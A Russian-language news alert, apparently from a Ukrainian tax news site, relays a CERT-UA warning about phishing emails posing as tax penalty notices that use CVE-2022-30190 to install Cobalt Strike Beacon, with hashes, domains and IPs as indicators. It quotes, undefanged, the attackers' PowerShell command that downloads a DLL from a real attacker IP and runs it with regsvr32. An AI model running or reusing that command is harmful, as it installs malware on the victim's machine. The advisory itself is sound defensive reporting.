Внимание! Мошенники рассылают фейковые письма о неуплате налогов

Команда CERT-UA предупреждает о новом виде рассылок от мошенников. Рассылки направлены на объекты критической инфраструктуры и имеют тему «Наложение штрафных санкций».

Фейковое письмо «Сообщение о неуплате налога» — опасный файл

С начала полномасштабной российской агрессии украинские предприятия часто страдают от кибератак и фишинговых рассылок. Госспецсвязи неоднократно информировали о порядке обращения с подозрительными письмами и неизвестными адресами, ведь часто запускается вредоносное программное обеспечение. Однако есть темы, которые затрагивают налогоплательщиков посильнее. На этот раз злоумышленники использовали тематику наложения штрафных санкций. 

Команда CERT-UA сообщает об обнаружении рассылок с документом «Наложение штрафных санкций.docx». Открытие указанного документа загружает HTML-файл и запускает выполнение Java Script кода CVE-2022-30190. В результате происходит загрузка и запуск вредоносной программы Cobalt Strike Beacon, дата компиляции: 16.06.2022.

Плательщики получили такой файл по электронной почте, якобы от Государственной налоговой службы. Использовалась тема письма:

• Уведомление о неуплате налога
• Наложение штрафных санкций

В письме находился защищенный паролем архив «НаложениеШтрафныхСанкций.zip»

Индикаторы компрометации

Файлы:

• 37c7b934661f31e526ffb31f7c935d5a    7d53782fab972b8b70c6c7134598da25fd125c58c88a6d468464cee6c9dbe764        НакладенняШтрафнихСанкцiй.zip 
• a3f3402656fc5be4439899b2a5f25eb6    bc6898f0e66582ab92307809a409797749b49948fc265767579b224755b0a17b        Накладення штрафних санкцій.docx
• 85851e09b368ebba90f5d922cd77f348    02b77a482120b7997f06da67f33cdb286ab06b7ef1bd9dfb2ad77a634595abfe        index.html
• 52f371a4f06f3398a5a361335920618c    394cbab9eb87ef8ee795d184137ac2634b22a0a3e642534a55c1623a813c8a59        ked.dll (Cobalt Strike Beacon)
•  

Сетевые:

• rostyslav.nal0g@gmail[.]com
• hXXp://64[.]190.113.51:8000/index[.]html
• hXXp://5[.]199.173.152/ked[.]dll
• hXXps://baidenfree[.]com/jquery-3.3.1.min.js
• baidenfree[.]com
• golgba[.]com
• domtern[.]com
• jorgava[.]com
• 185[.]143.223.29 (Received)
• 64[.]190.113.51
• 5[.]199.173.152
• 5[.]199.174.219
• 185[.]170.144.159
• 87[.]251.64.5
• 185[.]170.144.158

Хостовые:

• Invoke-WebRequest -Uri ‘http://5.199.173.152/ked.dll’ -OutFile ‘c:\windows\tasks\ked.dll’; start-process regsvr32.exe -ArgumentList ‘/s C:\windows\tasks\ked.dll’
• C:\windows\tasks\ked.dll

Вид письма:

Необходимо обязательно обращать внимание на адрес отправителя. Как видите, это сообщение распространялось с адреса [rostyslav.nal0g@gmail[.]com]. Официальные контакты ДПС указаны на сайте ДПС в разделе Контакты. 

Другие актуальные новости

Обратите внимание на следующие материалы:

• Новый закон отменяет военный сбор для военнослужащих, участвующих в боевых действиях. Подробности здесь. 
• Особенности представления и подтверждения данных о конечных бенефициарах 2022 — будут ли штрафовать за неподачи? Рассматриваем здесь.
• Работа банковской системы 27 и 28 июня – постановление НБУ. 
• Новый размер прожиточного минимума с 1 июля 2022 составит 2600 грн. Рассматриваем, какие показатели и для кого изменятся в этом материале. 
• Посевы утрачены из-за военных действий и их последствий:  что с учетом и налогообложением НДС? 
• Рассмотрим пошаговую инструкцию,  как получить подпись для ПРРО. 
• Госстат информирует об обновлении ряда форм статистической отчетности.  Список форм здесь.